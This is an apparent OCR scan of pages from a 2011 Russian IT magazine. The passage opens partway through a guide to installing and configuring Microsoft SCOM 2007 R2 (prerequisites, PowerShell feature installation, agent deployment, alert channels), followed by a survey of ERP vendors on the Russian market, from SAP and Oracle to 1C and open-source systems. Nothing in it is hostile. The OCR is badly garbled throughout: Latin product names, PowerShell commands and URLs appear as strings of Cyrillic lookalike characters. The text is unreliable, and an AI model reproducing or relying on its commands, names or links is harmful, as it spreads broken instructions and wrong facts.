ленные зависимости, иногда не разруливающиеся автоматически, 
в ее процессе просто следует быть внимательнее. В том смысле, 
что лихо нажимая клавишу МехЕ, получить на выходе работо- 
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способный 5СОМ весьма маловероятно — по ходу потребуется 
доустановка компонентов, багфиксов и сервиспаков. Причем 
бывает и так, что все вроде бы есть, ане работает... Вероятно, это 
происходит из-за того, что ОрзМдгвышел перед \\Ип2К8 и изна- 
чально не поддерживал новую ось, а все проблемы совместимости 
рихтовались при помощи сервиспаков (В 2 вышелв 2009 году}. По 
этой причине перед началом установки 5СОМ следует накатить 
(согласен, перед такими делом всегда следует накатить — прим. 
ред.] в ОС все обновления. 

Для работы серверной части нам понадобится компьютер (СРУ 

от 2,8 ГГц, КАМ от4 ГБ} под управлением \М/п2КЗ/2К8/К2, М5 

Я 5егуег вместе со службой отчетов М5 501 Зегуег (РерогИпд 
бег\/сез) плюс несколько дополнительных ролей и компонентов. В 
частности обязательна роль \М\еБ 5егуег [15]. Важно: 5СОМ 2007 В? 
официально не поддерживает М$ 501 2008 $Р? и К?, только 59Е 
2005 $Р2 и ОЕ 2008 $РТ. Но между «не поддерживает» и «будет 
работать» разница очень большая. В установочном комплекте до- 
ступна утилита ОВСгеа{е\\/тага.ехе, которая поможет создать нуж- 
ные БД. Затем в процессе установки просто отключаем ПШа{абазе и 
на следующем этапе указываем параметры БД вручную. Впрочем, 
автоматом такая связка не пойдет [см. зиррог(. писгозой.сопл/ 
кЬ/2425714). Да, кстати, не забудь открыть порты к 5@[ -серверув 
файере, как описано в с(сКк.гу/Е17А. 

Список всех конфигураций приведен по адресу с(<К.ги/ОгбМ, 
плюс в комплекте доступен Ргегеди$ Це \Мемег, который выдаст 
всю информацию касательно того, что нужно, и чего не хватает. 
Кроме того, нужны специфические настройки для компонентов, 
вроде установки |15 в автоматическую загрузку. Так что перед 
установкой нужно запускать, смотреть, устранять и проверять. В 
консоли Ро\ммеговеЦ достаточно дать команду: 


> Ттрог*-Моди1е $егуегМападег 

> Ааа-М1паом5Реафиге МЕТ-ЕгатемогкК-Соге , Меь-МетаБазе, 
меб -имТ , меь-5фа*1с-Соп%еп* , МеБ-Бефаи1*-Бос ,Меб-01г- 
Вгом$1п8 , Меб-НЕЕр-Еггог$ ,Меб-Азр-Ме{ , МеБ-Мет-Ех+ , Меб- 
Т5АРТ-Ех* , меб -Т5АРТ-Е11{ег , мебБ-Е11%ег1пз , Меб-им1пдом$ - 
Ацеп, Меб-МетЕ-Сопзо1е -г 


Плюс понадобится АЗР. МЕТ А]ах Ежепзтоп®. Его качаем по ссылке 
с(ск.ги/Ом/ЕУ и ставим. Консоль управления не требует мощного 
компьютера, а в качестве ОС подойдет \/пХР/\М!{а/7. Кроме этого 
должна быть соответствующим образом подготовлена среда Асйуе 
Онгескогу [имя домена, служба ОМ5$, уровень домена не ниже 2000). 
Для административных задач до начала установки следует создать 


отдельную С[оба|(-группу и пять входящих в нее учетных записей, 
две из которых — с правами локального администратора. 

Когда все требования выполнены, запускаем установочный файл. 
Обрати внимание, что агенты ОрзМог, модуль создания отчетов, 
сервер сбора аудита и шлюз ОрзМодгустанавливаются из отдель- 
ных меню. 

На этапе выбора компонентов указываем, что будем ставить на 
сервер. Далее, если установщик не обнаружил 51, вводим его 
данные и имя БД. После чего задаем данные учетной записи для 
Мападетеп{ ЗегуегАсНоп Ассочцп\, от имени которой выполняются 
основные операции и $0К апа Сопна Зегмсе Ассоип\. После чего 
указываем метод проверки подлинности веб-консоли. Предлагае- 
мую по умолчанию проверку подлинности \/пдо\м/5 следует оста- 
вить, если доступ кней будеттолько из внутренней сети; если же к 
веб-консоли будут обращаться через интернет, установи флажок 
«Использовать проверку подлинности» с помощью форм. 

И на последнем шаге включаем обновление. По окончании обя- 
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Перед установкой следует проверить наличие компонен- 
тов при помощи Ргегесм$йе Ме\мег 


зательно создаем архивную копию ключа, при помощи которого 
шифруются данные, здесь отказываться не стоит. Процесс прост, 
после активации появится простой визард, в котором следует 
указать имя файла и пароль для доступа. 

Аналогично просто доустанавливается модуль создания отчетов 
(Ра{ам/агевоизе и КерогИ пд Зегуег), сервер АСФ и консоль управ- 
ления [на админском компе). 

Теперь можно регистрироваться в консоли или используя веб- 
интерфейс [по умолчанию — порт51908]. 


}ервоначальные задачи 
настроики 


Консоль управления организована классически, в стиле оутлука. 
Слева находится пять вкладок, при помощи которых выбирают- 
ся основные задачи, — МопцКогта, Ащ{Погта, Адпипи{гаНоп, 
КерогИпд и Му \огК$расе. Назначение их очевидно. Наиболее 
часто используемые функции, чтобы долго их не искать, можно со- 
бирать в Му \\огК5расе. При выборе любого пункта выше откроют- 
ся доступные параметры. Все события выводятся в поле посере- 
дине, правое меню позволяет выполнить определенные действия. 
Советую некоторое время потратить на изучение консоли и 
разобраться с установками по умолчанию. Веб-консоль содержит 
только две вкладки: МопКог!пд и Му \\огК5расе и предоставляет, 
соответственно, меньшую функциональность. 
Список всех доступных командлетов Р5 можно получить, введя 
«Се-ОрегайопМападегСоттапа». Например, чтобы получить 
список всех серверов управления, вводим команду: 

Р5$> беё-тападетепе$егуег 
После установки можно проверить состояние сервера управления. 
Для этого переходим в МопКогпд и выбираем ссылку \\пЧо\/5 
Сотрщегили Орегайоп$ Мападег — Сервер управления. Состоя- 
ние должно быть показано как Неа(Ву. Щелчок по данным сервера 
выведет дополнительную строку с более подробным описанием. 
Во вкладке МопКогпд также показываются все текущие предупре- 
ждения (а{ег{$], диаграммы, задачи, приложения, устройства и 
так далее. В общем, все, что связано с мониторингом, мы найдем 
здесь. При выборе конкретного пункта в поле Асйоп$ показыва- 
ются возможные действия и связанная справка. Реализованы все 
необходимые инструменты — поиск, фильтр по времени и отобра- 
жение известного объекта. 
Еще один момент. При выборе основной задачи в поле Кедигеа 
Сопйадигайоп ТазК$ показывается список рекомендуемых даль- 
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нейших операций. Выбирая последовательно пункты и следуя 
подсказкам, можно быстро настроить среду мониторинга, не особо 
вчитываясь в документацию. 

Если обслуживается несколько доменов, настраиваем интегра- 
цию сАснуе Птгестогу, для этого выбираем ссылку СопЙдиге Аспуе 
Онес{огу [АО] [г{едгаНоп в поле ОрНопа[ СопНдугаНоп. Далее 
стартует мастер, в котором и указываем нужные домены. 
Рекомендуется устанавливать агенты на удаленных системах при 
помощи консоли. Но в случае необходимости можно использо- 
вать локальную установку при помощи инсталляционного диска 
СОМ и другие варианты распространения (групповые политики, 
внедрить в образ ит.п.). 

Итак, переходим в Ади! {гайоп и вызываем контекстное меню. 
Собственно большую часть операций по администрированию 
можно произвести, выбирая последовательно пункты этого 
контекстного меню [перемещаясь по нему сверху вниз). Здесь 
имеется около десятка пунктов, позволяющих развернуть агентов, 
создать/скачать/импортировать пакет управления, создать новую 
роль пользователя, канал, подписку, добавить группу управления 
и некоторые другие. 

Для установки агента выбираем первый пункт — О!5соуегу 
\М2ага. В результате наших нехитрых действий появится ма- 
стер, позволяющий найти нужные устройства. На первом шаге 
определяемся стипом компьютеров (\М//пдо\/$, Мпих или сетевое 
устройство], затем указываем, как искать (автоматически или 
«продвинутым» способом). При автоматическом способе мастер 
просканирует все компьютеры домена. Теперь задаем дополни- 
тельные критерии поиска (шаблон имени, роль ит.п.), выбираем 
учетную запись, от имени которой будет производиться поиск, и 
нажимаем Отзсоуегу. По окончании процесса отбираем объекты 
и указываем режим [адеп{ или адепт е$$} и, переходя к следую- 
щему шагу, устанавливаем агенты. Устанавливаемые агенты, а 
также агенты, требующие обновления или не распределенные, 
появляются в подменю Репатда Мападетепи. Затем, по оконча- 
нии (или после обновления}, они автоматически переносятся в 
Адепт Мападетепе\, где в последующем можно отслеживать его 
состояние. 

После установки агент каждые 60 секунд отсылает пакет данных на 
сервер, допускается пропуск трех таких пакетов, после чего сер- 
вер пытается связаться с компьютером, и в случае неудачи меняет 
его статус. При необходимости администратор может настроить 
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СОМ предоставляет админу диаграммы и графики 


время отсылки пакетов глобально [Адптип!{гаНоп = 
бе йто$ -» НеагБеа*, максимум до одного дня] или 
индивидуально, изменить количество пропусков или 
вовсе отключить такой мониторинг [например, для 
компьютеров, подключающихся периодически). 

Еще одной интересной функцией 5СОМ является цен- 
трализованная отсылка в М$ сообщений СЕР и оши- 
боксклиентских компьютеров. Все это настраивается 
при помощи мастера СЦеп{ МопКогтпа Сопйдига\оп, 
запускаемого из контекстного меню Мападетеп\{ 
Зег\уег. 


Создание оповещений 


Агент собирает данные, но в случае возникновения 
проблем, администратор о них узнает лишь при анали- 
зе данных в консоли, а решение нередко необходимо 
принимать моментально. Поэтому следующий шаг — 
настройка предупреждений. Состоит он из нескольких 
несложных этапов. 

Так, после установки СОМ не знает, что ему собирать, 
не различает приложения и сервисы. Какуже говори- 
лось выше, помочь ему в этом могут пакеты управле- 


ния. В поставке доступно почти 50 пакетов управления, 


просмотреть их список можно в Адпип!>{гайоп - 
Мападетеп( Раск. Выбор свойств любого покажет 
подробную информацию. Если имеющихся МР не- 
достаточно для контроля установленных сервисов и 
приложений, то следует поискать в указанных выше 
репозиториях, а затем — импортировать пакеты при 
помощи пунктов Оом/пхаа Мападетеп( РасК и |трог 
Мападетеп+ Раск. После импорта 5СОМ сравнивает 
данные агентов и информацию в пакетах, обнаруживая 
специфические приложения, и выводит все доступные 
атрибуты объектов. 

Следующий шаг — создание канала, то есть ме- 


тода оповещения администратора. Переходим в 
МойНсаНоп$ -» СВаппе(, в контекстном меню выбираем 
Мем/ и один из вариантов: етац, |М, $М$ и команда. 
После этого запускается мастер, который поможет на- 
строить выбранный канал. Например, в случае сета 
задаем данные $МТР-сервера и шаблон сообщения. 
Чтобы указать адреса получателей предупреждения, 
выбираем пункт Ме\м/ 5ибзсгБег, указываем имя под- 
писчика, время отсылки сообщений [по умолчанию 
всегда) и собственно адреса электронной почты. 

И наконец, создание подписки — Зибзсгрйоп®. Пере- 
ходим в соответствующий пункт меню, выбираем Ме\м/ 
и следуем указаниям мастера. Важный шаг — соз- 
дание критериев, то есть типов сообщений, которые 
будут перенаправляться подписчику. По умолчанию 
отправляются все сообщения, что не всегда удобно. 

В большой среде с несколькими админами вероятнее 
придется распределить их более точно, используя 
фильтры. Далее указываем подписчиков для события, 
выбираем канал. При необходимости — определяем 
задержку в отправке сообщения, чтобы не бежать 
сразу, ведь часто бываеттак, что проблемы решаются 
сами собой :]. 

Теперь в случае сбоя админ получает сообщение с 
описанием ситуации, а для получения более подроб- 
ной информации можно тут же перейти по ссылке на 
веб-консоль. 


Заключение 


В статье затронуты лишь основные возможности такого 
весьма полезного инструмента как 5СОМ, который 
после настройки будет мониторить инфраструктуру, 
предупреждая админа о проблемах. При дальнейшем 
знакомстве тебе помогут документация проекта и, ко- 
нечно, собственные экспериментальные данные. == 
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Ш № Андрей Полыгаев (ро{удаеу@дтай.сот) 


ЕКР — на любой 


вкус! 


Обзор ЕКР-систем: да, про Ореп$оигсе 


мы тоже не забыли 


Несмотря на большое количество систем ЕВР на рынке, выбор подходящей системы ограничен доста- 
точно узким кругом решений. И этот совсем не очевидный факт надо учитывать при проведении вы- 
бора. О том, как правильно подойти к выбору ЕВР-системы, о сложившейся расстановке сил на россий- 
ском рынке и важных моментах самого выбора мы и будем говорить в нашей статье. 


Про цепи ограничений 

роц р 

1. Сегментация рынка ЕКР 

Ключом в правильном выборе подходящей ЕВР-системы является 
точное позиционирование своей компании относительно карты 
решений того или иного производителя. 

Поясним эту мысль. Каждая ЕКР-система обладает определенной 
функциональностью, покрывает какое-то количество предмет- 
ных областей. Например, решение российской компании «1С» 

— «1С: Управление производственным предприятием» является 
универсальной системой (в терминах разработчика «Конфигу- 
рацией»), обеспечивающей управление основными функциями 
предприятия: учет товарных запасов, управление расчетами с 
контрагентами, учет основных средств и товарно-материальных 
ценностей и так далее. Таким образом, данный продукт более 
всего подходит для производственных компаний. А вот для авто- 
матизации розничной торговли придется выбрать конфигурацию 
«1С: Розница». Количество подобных базовых конфигурацийу 
«1С» — более 20. Понятное дело, что выбрать нужное решение 
непросто. 

Подобными трудностями сложность задачи не исчерпывается. 
Кроме набора функциональности, которую поддерживает ЕКР, про- 
изводители вводятеще и отраслевую специализацию. Например, в 
линейке ЕКР-решений 5АР есть специализированные решения для 
финансового сектора, производственных компаний, компаний, 
работающих нарынке услуг, торговых компаний и общественных 
организаций (здравоохранение, образование ит.п.). 

Не нужно удивляться, что и этоеще не все. Кроме указанных 
вариантов естьеще разделение продуктов по стоимости решения 
(свыше $1 млн, от $100 тыс. до $1 млн, до $100 тыс.), размерам 
бизнеса (крупный — оборот свыше $500 млн в год, средний — 
оборот от $100 млн до $500 млн в год, мелкий — оборот до $100 
млн в год) и количеству пользователей, подключенных к ЕКР- 
системе. Все это удивительно напоминает чехарду в тарифных 
планах сотовых операторов. Основная причина такого разноо- 
бразия — желание производителя ЕКР повысить ценность своего 
решения для потенциального заказчика. А поскольку подобная 
«кастомизация» несоизмеримо дешевле разработки нового про- 
дукта, то и используется подобная практика очень широко. 
Поэтому, возвратившись к началу нашей статьи, утвердим сле- 
дующий тезис: точное позиционирование своей компании отно- 
сительно карты решений того или иного производителя является 
ключом куспеху в выборе и внедрении ЕКР. 

Сегментация, или разделение рынка потенциальных клиентов 
наопределенные группы, является обязательным элементом по- 


зиционирования ЕКР-системы. Основными измерениями такого 
позиционирования являются функциональность, отрасль, стои- 
мость, размер бизнеса. Таким образом, сегментация выглядит 
как многомерный куб, в котором указанные измерения являются 
осями координат. Обычно, при выборе системы проводят встречи 
с профессиональными консультантами. Основная задача которых 
— правильно спозиционировать компанию-клиента в много- 
мерной матрице решений различных производителей и пред- 
ложить наиболее подходящий для нее продукт. К сожалению, как 
правило, консультанты заранее ориентированы на определенное 
решение и стараются «натянуть» потребности клиента под воз- 
можности именно этого продукта. Поэтому наиболее рациональ- 
ный выход в этой ситуации — выбор нескольких консультантов с 
разными решениями. 


2. Ключевые игроки на рынке ЕКР 

Давайте рассмотрим ключевых игроков на российском рынке 
ЕКР-систем и остановимся на наиболее важных и интересных 
моментах, предлагаемых ими решений. 

По результатам 2009 года (данные за 2010 годеще не опублико- 
ваны), которые представила ГЛ5, российский рынок ЕКР-систем 
выглядит как изображено на рисунке 2. 

Впереди сбольшим отрывом идут решения от 5АР, далее следует 
российский продукт 1С, затем — решения от Ога {е, М!сгозой и 
наша «Галактика». Остаток под названием «другие» включает 

в себя десяток самых различных систем, «выживающих» или 
застолбивших свои огороды втой или иной нише. Интересно 
соотнести данные результаты, например, с мировыми рейтин- 
гами ЕВР-систем, согласно которым, мы видим немного другую 
ситуацию. 

Какмы уже говорили выше, многие разработчики имеют на 
рынке различные предложения для самых разных сегментов за- 
казчиков. Наличие большого пакета подобных решений является 
косвенным подтверждением устойчивого положения системы 
на рынке. Все крупные игроки имеют целый набор подобных 
решений. Для оценки зарубежных решений можно использовать 
квадрат Гартнера (рис. 3), который показывает рейтинги систем. 
Пойдем по порядку, рассмотрев представленные системы по ряду 
стандартных признаков — положение нарынке, позиционирова- 
ние, набор доступных модулей ит.д. 


АР 


Положение на рынке 
Компания $АР, ведущий поставщик бизнес-приложений вмире, 
давно (в течение 18 лет) и успешно вспахивает российскую 
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Сравнение ЕКР систем 


Управление закупками 


1.4 


ТСО на 7 лет 


Стоимость оборудования 


Стоимость консалтинга 


Стоимость лицензий 


Управление 
отношениями с... 


Диаграмма-радар как пример сравнения ЕКР-систем 


Упраление 
производством 


Управление складом 
1 ЕКРЗ 
51 ЕВР2 


Сводное планирование д ЕВРЛ 


Управление продажами 


Управление Финансами 


борозду ЕВР-систем. На данный момент компания выделяет два 
ключевых пакета для автоматизации бизнеса: ЗАР Визшез$$ Опеи 
АР Визше$$ А|-т-Опе. 


Позиционирование 

АР Ви5шез$$ АП-шт-Опе — полный пакет бизнес-приложений для 
крупных компаний, численностью до 2500 сотрудников. 5АР 
Визшез$5 Опе — пакет бизнес-приложений для средних и мелких 
компаний, численностью до 100 сотрудников (понятное дело, 
работающих с системой). 


Набор доступных модулей 

Состав модулей ЕКР-систем от АР покрывает все возможные 
функциональные области современного предприятия: управ- 
ление материальными потоками, планирование и исполнение 
производства, продажа и дистрибуция, логистика, управление 
жизненным циклом продукта, управление качеством, финансо- 
вый учет, контроллинг (учет затрат и прибыли), документообо- 
рот и отчетность. 

На сайте компании (\м/г//.зар.сот) доступен специальный конфи- 
гуратор, который позволяет сформировать необходимый пакет 
решений и рассчитать его ориентировочную стоимость (рис. 4). 
Надо добавить, что в дополнение кданным двум продуктам 5АР 
предлагает дополнительные решения для некоторых ключевых 
процессов: АР $5СМ — решение по управлению цепочкой поста- 
вок, ЗАРЪВКМ — решение по управлению взаимоотношениями с 
поставщиками и так далее. 


Ключевые особенности 

Отметим ключевые особенности продуктов 5АР: детальная про- 
работка решения, как по отраслям, так и по процессам, высокая 
стабильность работы и производительность, высокая стоимость 
консалтинга — традиционно, консультанты по внедрению ФАР 
являются самыми дорогими на рынке. 


Положение на рынке 
Следующий лидер в среде бизнес-приложений — компания 


Ота{е. Компания агрессивно поглощает лучшие решения в 
различных областях и включает их в состав своих приложений. 
Поэтому среди решений от Ога е всегда можно найти то, которое 
удовлетворит потребности. Правда, остаются вопросы унифика- 
ции и интеграции приложений между собой. 


Позиционирование 

Флагманским продуктом категории ЕВР-решений является систе- 
ма Огасе Е-Визштез$ биЦе. Пакет Ога е Е-Ви$тез$ 5иКе ориенти- 
рован накрупные компании. Стоимость внедрения зависит от 
набора внедряемых модулей и составляет сотни тысяч условных 
единиц. В настоящее время доступна версия №12 данной системы. 


Набор доступных модулей 

В состав системы входят основные Модули для управления 
предприятием: управление сервисом, управление финансами, 
управление человеческим капиталом, управление портфелем 
проектов, управление жизненным циклом активов, управление 
взаимоотношениями с заказчиками, планирование ресурсов 
предприятия, управление закупками, управление жизненным 
циклом продукта, управление цепочкой поставок, управление 
производством. Кроме того, для данного пакета доступны допол- 
нительные модули: управление производительностью предпри- 
ятия, управление риском и уровнем соответствия, управление 
мастер-данными, бизнес-одобрения для менеджеров, средства и 
технологии. 


Позиционирование 

Еще одним решением класса ЕКВР от Огасе является система 
ОКАСГЕ’5 РЕОРГЕЗОЕТ ЕМТЕКРЕВ1Т$Е. Система позиционируется 
как решение для крупных и средних компаний. 


Набор доступных модулей 

Набор модулей содержит традиционные для ЕКР-систем ком- 
поненты: управление жизненным циклом активов, управление 
взаимоотношениями с заказчиками, управление финансами, 
управление человеческим капиталом, управление портфелем 
проектов, управление цепочкой поставок, управление закуп- 


ХАКЕР 08 /151/ 2011 


> 125 


Рис 1. Базовая функциональность ЕКР 


Использованные материалы: 


® Системы управления бизнесом $АР: 
зар.согп/с!5/згпе/зо[иНоп$/буизтезтпападететсогтрагебтт/ 


пдех.ерх. 
® Официальный сайт компании Огасе: 
огас[е.согп/ги/ргодис/аррИсаНоп$/еБизте$$/Липадех.Вги(, 


® Официальный сайт компании Мисго5ой 
пп/сго$ов. сопп/гиз/дупагис$/Че аи. гперх. 

® Сайт компании «Фронтстеп» 
гог(ер.ги/ргодис{/5уУете/ЛпюгЕВР\е! пе. 


® Сайт компании «Галактика» 
даакикКа.ги. 


® Сайт компании «1С» 

ен 

 ТАОМЬЕК — центр выбора технологий и поставщиков 
{адмзег.ги. 


ками. Но кроме того, в данном решении есть, например, такой 
экзотический модуль, как управление кампусом. На российском 
рынке это решение продвигается не очень активно, хотя некото- 
рые внедрения имеются. 


Позиционирование 
Решением от Огасе для среднего и малого бизнеса является набор 
приложений Огас[е’; Ло Еаугага$ Етцегри1зе Опе. 


Набор доступных модулей 

Данное решение включает в себя достаточно ПОЛНЫЙ набор приложе- 
НИЙ: управление жизненным циклом активов, управление взаимо- 
отношениями сзаказчиками, управление финансами, управление 
человеческим капиталом, разработка и производство, управление 
заказами, управление проектами, недвижимость и строительство, 
планирование цепочки поставок, управление цепочкой поставок, 
управление закупками, производство продуктов питания и напит- 
КОВ. Данная система имеет высокую степень внутренней интеграции 
модулей. 


Ключевые особенности 

Приложения от Огас{е, как правило, характеризуются мощной 
функциональностью. Это связано стем, что расширение ЕВР часто 
происходит за счет поглощения ораклом независимых систем, 
лучших в своем классе, и последующей их интеграции в набор своих 
приложений. 

Обратной стороной такого пути развития является низкая степень 
интеграции систем внутри пакета. Дело доходит дажето того, что 
интерфейс приложений внутри пакета разный. 

Стоимость продуктов также не маленькая и неуступает АР, а не- 


"Галактика": 3,90% — ор ыы 


} ЗАР: 50,10% 


Мсго5ой 
Оупаптс$; 7,10% 


Огасе; 9,60%— 


"1С"; 22,30% 


Рис. 2. Распределение российского рынка ЕКР (по данным 
ОС) 


достаточное количество специалистов по внедрению и поддержке 
конкретных модулей обуславливает высокую стоимость и порой =—= 
отсутствие нарынке. 


М/сго$ой 

Положение нарынке 

Продвижением бизнес-решений М1сгозой в России занимается 
подразделение М!сгозоЁ Визтез$; зо[иНолп. На первой волне высокой 
активности и продвижения своих ЕКР-систем на российский рынок 
М1сгозой сумела захватить заметную долю рынка, которую доста- 
точно успешно защищает. При этом, серьезных причин для активно- 
го роста доли рынка данного продукта не наблюдается. 


Позиционирование 

С решениями ЕКР от мирового зомгаге-лидера все немного проще... 
и грустнее. Влинейке МПсгозоЁ представлено два продукта, отпо- 
зиционированных какЕКР-системы. Это М!сгозо_ Бупапс$ АХ для 
крупных и средних предприятий и М!сгозо_ Оупапл1с$ МАУ для сред- 
них и мелких предприятий. Кроме того, имеются индустриальные 
решения для некоторых отраслей, например, М!сгозо_ Рупап!с$ АХ 
Гог ВегаП. Надо заметить, что по сравнению сколичеством индустри- 
альных решений от $ЗАРи Огас[е М!сгозой, конечно же, отстает. 


Набор доступных модулей 
Области, которые покрываются функциональностью Мсгозой 
Рупап!с$ АХ, представлены нарисунке 5. 


Набор доступных модулей 
Функциональность МПсгозо_ Рупапс$ МАУ более ограничена (см. 
рис. 6). 


Ключевые особенности 

М1сгозой достаточно активно продвигает свои решения на нашем 
рынке. Поэтому количество внедрений каждого из продуктов доста- 
точно велико. При этом, к достоинствам решений от М!сгозой надо 
отнести более демократичные цены, по сравнению срешениями от 
5АРи Огасе. К недостаткам — менее проработанную функциональ- 
НОСТЬ. 


|МЕОК 


Положение на рынке 

Еще одним зарубежным решением, заслуживающим отдельного упо- 
минания, является решение от компании ПМЕОК. Хотя в российском 
рейтинге они не выделились заметной долей рынка, однако на ква- 
драте Сапег данная компания и ихЕКР-система шюгЕКР уе пе 
занимаютнеплохое положение. 


Позиционирование 
Данное решение предназначено для промышленных компаний с 
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Рис. 3. Квадрат СайПпег для ЕКР среднего сегмента 


так называемым дискретным производством: машиностроение, 
производство электроники, деревообработка ит.д. Это и объясняет 
небольшую долю рынка. 

Однако, с ростом промышленности в нашей стране (это ведь правда 
случится? ), будем надеяться, что количество внедрений данного про- 
дукта будет расти.ю 

Набор доступных модулей 

Система содержит следующие функциональные модули: управле- 
ние производственными процессами, управление снабжением и 
планирование, обслуживание клиентов, управление финансами, 
администрирование. 

Кроме того, данное решение может быть интегрировано с другими 
продуктами от компании ПМЕОК: управление цепочками поставок, 
планирование и оптимизация, управление взаимоотношениями с 
клиентами. 


Ключевые особенности 

Стоимость решений от [ПМЕОК находится примерно наодном уровнес 
решениями от М!сгозой. 

Количество специалистов невелико, но нишевость и ориентирован- 
ность насвоих клиентов позволяют данному продукту чувствовать 
себя уверенно нанашем рынке. Количество внедрений этого реше- 
ния на российском рынке небольшое, но стабильное. 


«Галактика» 


Переходим к российским системам. Пионером рынка российских 
ЕВР является компания «Галактика», которая активно бъетсязавы- 
живание в данном сегменте. 


Положение на рынке 

«Галактика» была первым российским разработчиком ЕВР-систем, 
заявившим о себе как олидере российского рынкаЕКР. Все эти годы 
компания активно развивала свой продукт и продвигалаего в массы. 
К сожалению, сейчас движение дается компании все труднее и 
труднее. 


Позиционирование 

ЕКР-система «Галактика» является взрослой и полнофункциональ- 
ной системой управления предприятием, ориентированной на 
крупные и средние предприятия. 


Набор доступных модулей 

Онасодержит практически полный набор функциональных блоков 
классической ЕВР-системы (в терминах «Галактики» — «конту- 
ров»). 

Полный состав ЕВР-системы «Галактика» выглядит так: контур 
планирования и управления финансами (Етапс1а! Мапагетепе 

— ЕМ), контур управления человеческим капиталом (Нитап 
Сарйа| Мапасетеп+ — НСМ), контур управления производством 
(Мапуасгаите Мапагетеп- ММ), контур управления проекта- 
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Рис. 4. Пример конфигурирования решения 5АР Ви$те$$ 
А]-п-Опе на сайте компании. 


ми (Рто]есЕ МапазетептЕ — РМ), контур управления цепочками 
поставок ($ирру СВат Мапагетеп — $СМ), контур управления 
взаимоотношениями с поставщиками (5ирр|ег Ве]аноп$ р 
МапагетепЕ — $ВМ), контур управления активами (Ет{егри1зе 
А55еЁ МапазетепЕ — ЕАМ), контур управления ремонтами (ТОРО), 
контур управления взаимоотношениями склиентами (Сизтотег 
Ве@аноп$ р МапагетепЕ — СВМ) и другие. 

Кроме того, для поддержки специальных задач предприятия раз- 
работаны решения, дополняющие функциональные возможно- 
сти системы ЕБР: интеллектуальный анализ деятельности пред- 
приятия по ключевым показателям — «Галактика В1› (Виз1пе$$ 
(еШсхепсе), управление инвестиционными программами, 
управление НИОКР, управление недвижимостью, учет формен- 
ной спецодежды и вещевого имущества, консолидация и анализ 
данныхв Ехсе]. 

Также существуют отраслевые решения для ключевых отраслей: 
машиностроение, образование, транспорт, энергетика и другие. 


Ключевые особенности 

ЕВР-система «Галактика» отличается более низкой стоимостью 
внедрения по сравнению сзарубежными системами. 

Очевидно, что она имеет ярко выраженную региональную ориен- 
тацию на российский рынок и рынок СНГ, на котором и занимает 
заметную долю, которую приходится защищать с двух сторон — со 
стороны зарубежных систем и со стороны наиболее активного рос- 
сийского конкурента —«1С». 


«| С» 


Положение на рынке 
Про «1С» в России знают все. Раскрыть, а тем более повторить 
секрет успеха данной компании пока не удалось никому. 
Ключевое направление развития компании — приложения для 
бизнеса. В данном направлении компания медленно, но неуклонно 
движется вверх: от маленьких компаний — к средним и крупным. 
Движение настолько неторопливое, Насколько целенаправленное 
и успешное. 


Позиционирование 

Наданный момент уже можно говорить о том, что решения ком- 

пании «1С»› безраздельно господствуют в сегменте зта]-бизнеса 
и отъедают весомую часть в п!А4е-бизнесе. На очереди крупные 
компании? 


Набор доступных модулей 

Функциональность системы «1С: Управление производственным 
предприятием» представлена на карте решений на рисунке 8 (ис- 
точник — сайт«1С»). Она, конечно же, меньше, чем карта модулей 
решений от $АР или Огас[е, но вполне может конкурировать, на- 
пример, с решением от Мсгозой Рупапис$ МАУ. 
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Рис. 5. Функциональность Мсгозой Бупаптс$ АХ 


Ключевые особенности 

Главный козырь «1С» — низкая стоимость решения, помножен- 
ная на огромное количество партнеров по внедрению и насамое 
лучшее соответствие требованиям российского законодательства. 
Такая мультипликация сильных сторон образует поистине взры- 
воопасную смесь для борьбы с конкурентами. 

В качестве сильных сторон второй очереди — самые низкие ставки 
на специалистов по данному продукту. При этом надо заметить, 
что стоимость проектов «1С» неуклонно растет, и уже давно есть 
на рынке проекты ЕВР на«1С»за миллионы долларов. И вотв этом 
случае надо призадуматься — астоитли? 


Решения Ореп 5оигсе 

Отдельного упоминания заслуживают ЕКР-решения на базе Ореп 
соигсе-модели. Это сравнительно новая для российского рынка 
ЕКР группа решений. Хотя сама модель решений Ореп 5опгсе уже 
существует и продвигается на рынке очень давно. 

Наверное, большое число поклонников решений подобного рода 
найдутся среди молодых бизнесменов и ИТ-специалистов, которые 
впитали вкус Ореп 5оигсееще на этапе становления своей карье- 
ры. Поэтому быстро пройдемся по данным решениям. 


Орепбгауо ЕКР 


Некоторые факты 

ОрепЬгауо — бесплатная ЕКР-система с открытым кодом, 
разработанная в Испании. Имеет множество наград от Ореп 
боигсе-сообщества. В России система поддерживается центром 
компетенции ОрепЬгауо Визз1а, который выполняет и локали- 
зацию данного продукта. Система работает через интуитивно 
понятный красивый меЬ-интерфейс и обладает широкой функ- 
циональностью. 


Набор модулей 
Набор доступных модулей для данного продукта достаточно ши- 
рок: управление закупками, управление продажами, управление 
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складом, управление производством, управление финансами, 
сводное планирование, управление контрагентами, управление 
активами, управление проектами, управление отношениями с 
клиентами. Получаемый набор полностью соответствует таковому 
увзрослых ЕВР-систем. 

Кроме того, ОрепЬгауо содержит механизмы мотКНом! — управ- 
ления процессами. Система работает в виде мер-приложения, на- 
писанного на языке Лауа. Функционирует налюбых операционных 
системах, поддерживающих Лата. 


Условия распространения 

ОрепЬгауо — свободна для скачивания, распространяется сдис- 
трибутивом [тих ОБипи, а также представлена версия в виде 
виртуальной машины для облака Ататоп \\еЬ 5егу1сез. 


Сотриеге 

Некото р факты 
Сотр1еге — ЕВР-система с открытыми исходными кодами для 
предприятий малого и среднего бизнеса. Сотшр1еге неофициаль- 
но считается лидером среди Ореп 5опгсе ЕКР-систем. В августе 
2008 года журнал шю\МопА наградил Сотр!еге премией «Во5з1е 
Амгага» в номинации «Лучшее в мире ЕКР-решение на открытых 
исходных кодах». 
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Система поддержки принятия решений для руководителей 
Галактика ВТ (Визте5$ Тпфе!депсе): 
мониторинг деятельности предприятия /группы компаний по ключевым показателям 


Галактика ЕЕР 
Производство (ММ) 
[дискретное, процессное, проектное) 
Логистика, договора, цепочки 
поставок [5СМ) 

Финансы [2М), бухгалтерский и 
налоговый учет 
Парсонал (НСМ) 
Взаимоотношения с клиентами (СЕМ) 
Качество продукции 
Управление ремонтами (ТОРО 
управление активами (ЕАМ) 


Специальные решения 
управление 
инвестиционными 
программами 
Недвижиность 

НИОКР 

Учет форменной 
спецодежды и вещевого 
имущества 
Консолидация Ехса]- 
отчетности 


Отраслевые решения 


Машиностроение 

Вузы 

Строительство 

Транспорт 

Пищевая промышленность 
Нефтегазовый комплекс 
Энергетика 

Страхование 


Технологическая платформа, средства разработки. 
